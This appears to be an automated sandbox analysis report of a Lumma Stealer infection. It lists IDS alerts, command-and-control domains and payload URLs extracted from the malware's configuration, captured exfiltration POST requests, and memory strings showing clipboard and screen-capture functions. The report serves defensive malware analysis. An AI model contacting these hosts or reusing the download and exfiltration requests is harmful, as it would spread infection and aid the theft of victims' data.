Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+edx-44E6DB40h]	10_2_0038D4D6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+eax-80h]	10_2_00399CC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp word ptr [esi+edi+02h], 0000h	10_2_00399CC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov word ptr [eax], cx	10_2_00399CC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov edx, ebx	10_2_003AF4C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edi, dh	10_2_003AF4C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 31E2A9F4h	10_2_003A9500
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov edx, ebx	10_2_003AF550
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edi, dh	10_2_003AF550
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov edx, ecx	10_2_00386548
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, eax	10_2_0039CDAC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov word ptr [eax], dx	10_2_0038AD93
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov byte ptr [ebp+00h], al	10_2_00398633
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then push esi	10_2_0039A623
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, eax	10_2_0039CE04
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov edx, ecx	10_2_003AE678
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	10_2_003AE678
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov edx, ecx	10_2_003AE674
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	10_2_003AE674
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov dword ptr [ebp-20h], eax	10_2_00385656
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	10_2_00385656
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, eax	10_2_0039CE4C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov eax, ecx	10_2_0038D6F4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov byte ptr [ebx], al	10_2_0038D6F4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	10_2_003A5F00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov word ptr [esi], cx	10_2_00395FA6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-091E2CE1h]	10_2_00395FA6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp word ptr [esi+ecx], 0000h	10_2_003927F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, eax	10_2_003927F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edi, byte ptr [esp+esi-00005E99h]	10_2_0038AFD7

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058661 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (imbibelubmbe .click in TLS SNI) : 192.168.2.4:49889 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2058661 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (imbibelubmbe .click in TLS SNI) : 192.168.2.4:49897 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2058660 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (imbibelubmbe .click) : 192.168.2.4:53299 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058661 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (imbibelubmbe .click in TLS SNI) : 192.168.2.4:49913 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2058661 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (imbibelubmbe .click in TLS SNI) : 192.168.2.4:49904 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2058661 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (imbibelubmbe .click in TLS SNI) : 192.168.2.4:49928 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2058661 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (imbibelubmbe .click in TLS SNI) : 192.168.2.4:49919 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2058661 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (imbibelubmbe .click in TLS SNI) : 192.168.2.4:49945 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2058661 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (imbibelubmbe .click in TLS SNI) : 192.168.2.4:49936 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49897 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49897 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49889 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49889 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49945 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49936 -> 188.114.97.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: wholersorie.shop
Source: Malware configuration extractor	URLs: noisycuttej.shop
Source: Malware configuration extractor	URLs: imbibelubmbe.click
Source: Malware configuration extractor	URLs: tirepublicerj.shop
Source: Malware configuration extractor	URLs: abruptyopsn.shop
Source: Malware configuration extractor	URLs: framekgirus.shop
Source: Malware configuration extractor	URLs: cloudewahsj.shop
Source: Malware configuration extractor	URLs: rabidcowse.shop
Source: Malware configuration extractor	URLs: nearycrepso.shop

Source: global traffic

HTTP traffic detected: GET /mazkk.eml HTTP/1.1Host: deduhko.klipzyroloo.shopConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 185.161.251.21 185.161.251.21

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49889 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49897 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49913 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49904 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49928 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49919 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49945 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49936 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49951 -> 185.161.251.21:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: imbibelubmbe.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: imbibelubmbe.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Q74O17O4JHA9CJ6NOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: imbibelubmbe.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PNATZCY1T357User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8749Host: imbibelubmbe.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UHJAPGRGYDDYHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20408Host: imbibelubmbe.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HDUHR8BAL4UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1207Host: imbibelubmbe.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3OEVAHF2KSUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1066Host: imbibelubmbe.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 115Host: imbibelubmbe.click
Source: global traffic	HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /mazkk.eml HTTP/1.1Host: deduhko.klipzyroloo.shopConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop

Source: global traffic	DNS traffic detected: DNS query: deduhko.klipzyroloo.shop
Source: global traffic	DNS traffic detected: DNS query: imbibelubmbe.click
Source: global traffic	DNS traffic detected: DNS query: cegu.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: imbibelubmbe.click

Source: mshta.exe, 00000000.00000003.1660293289.0000000005A61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://en.wPiX
Source: powershell.exe, 00000002.00000002.1783096842.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2508992308.00000000056C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.2508992308.00000000047A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1781410096.0000000004EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2508992308.0000000004661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2508992308.00000000047A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1781410096.0000000004EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2508992308.0000000004661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 0000000A.00000002.2891598651.0000000000783000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/
Source: powershell.exe, 0000000A.00000002.2894337354.0000000000819000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2891598651.0000000000783000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/8574262446/ph.txt
Source: powershell.exe, 0000000A.00000002.2891598651.0000000000783000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/8574262446/ph.txtI
Source: powershell.exe, 0000000A.00000002.2892223741.00000000007A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/8574262446/ph.txtSVHj
Source: powershell.exe, 0000000A.00000002.2888825435.000000000032B000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/8574262446/ph.txtebKit/537.36
Source: powershell.exe, 0000000A.00000002.2891598651.0000000000783000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/C
Source: powershell.exe, 0000000A.00000002.2891598651.0000000000783000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/U
Source: powershell.exe, 0000000A.00000002.2891598651.0000000000783000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/x
Source: powershell.exe, 0000000A.00000002.2893886945.00000000007FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop:443/8574262446/ph.txt
Source: powershell.exe, 00000004.00000002.2508992308.00000000056C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.2508992308.00000000056C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.2508992308.00000000056C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.2508992308.00000000047A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://deduhko.klipzyroloo.shop
Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://deduhko.klipzyroloo.shop/mazLR
Source: powershell.exe, 00000004.00000002.2542794546.0000000006D74000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deduhko.klipzyroloo.shop/mazkk.
Source: powershell.exe, 00000004.00000002.2506306725.0000000000420000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2507391421.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2506306725.000000000045A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deduhko.klipzyroloo.shop/mazkk.eml
Source: powershell.exe, 0000000A.00000002.2890844747.0000000000779000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2893816228.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2892223741.00000000007A5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2897179208.0000000004D7E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dfgh.online/invoker.php?compName=
Source: powershell.exe, 00000004.00000002.2508992308.00000000047A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.2549131224.0000000008000000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: powershell.exe, 00000004.00000002.2549131224.0000000008000000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: powershell.exe, 00000004.00000002.2549131224.0000000008000000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: powershell.exe, 0000000A.00000002.2893886945.00000000007FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imbibelubmbe.click/
Source: powershell.exe, 0000000A.00000002.2893886945.00000000007FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imbibelubmbe.click/api
Source: powershell.exe, 0000000A.00000002.2893886945.00000000007FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imbibelubmbe.click/apiq
Source: powershell.exe, 0000000A.00000002.2893886945.00000000007FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt
Source: powershell.exe, 0000000A.00000002.2893886945.00000000007FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipvumisui.shop/int_clp_sha.txta=
Source: powershell.exe, 0000000A.00000002.2893886945.00000000007FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtopw
Source: powershell.exe, 00000002.00000002.1783096842.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2508992308.00000000056C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.2549131224.0000000008000000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: powershell.exe, 00000004.00000002.2549131224.0000000008000000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: powershell.exe, 00000004.00000002.2549131224.0000000008000000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49919
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49904
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49889 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49897 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49904 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49913 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49919 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49928 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49936 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49945 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49951 version: TLS 1.2

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 10_2_003A3890 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

10_2_003A3890

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 10_2_003A3890 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

10_2_003A3890

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 10_2_003A3A40 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

10_2_003A3A40

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 4108, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6272, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0694A1F0 NtResumeThread,	4_2_0694A1F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0694A2A0 NtResumeThread,	4_2_0694A2A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0694A1EA NtResumeThread,	4_2_0694A1EA

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06701DAB	4_2_06701DAB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06700448	4_2_06700448
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06706270	4_2_06706270
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06704170	4_2_06704170
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0670EB28	4_2_0670EB28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0670EB18	4_2_0670EB18
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_067088EF	4_2_067088EF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06708920	4_2_06708920
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06710BC8	4_2_06710BC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06718F70	4_2_06718F70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06710F3B	4_2_06710F3B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06719FF1	4_2_06719FF1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0671056D	4_2_0671056D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06710319	4_2_06710319
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06710BC2	4_2_06710BC2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_067103B8	4_2_067103B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06710040	4_2_06710040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06710011	4_2_06710011
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0671A000	4_2_0671A000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_067110C0	4_2_067110C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_067110B0	4_2_067110B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0671E928	4_2_0671E928
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_068E62FF	4_2_068E62FF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_069416B8	4_2_069416B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_069447D8	4_2_069447D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_069447C8	4_2_069447C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06948B16	4_2_06948B16
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0694AC90	4_2_0694AC90
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0694AC80	4_2_0694AC80
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0694B15B	4_2_0694B15B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003A8810	10_2_003A8810
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00398130	10_2_00398130
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0037E9AA	10_2_0037E9AA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003931E0	10_2_003931E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003891D6	10_2_003891D6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00382AE0	10_2_00382AE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0039DBBA	10_2_0039DBBA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003953D0	10_2_003953D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_003A84D0	10_2_003A84D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0038A5C1	10_2_0038A5C1
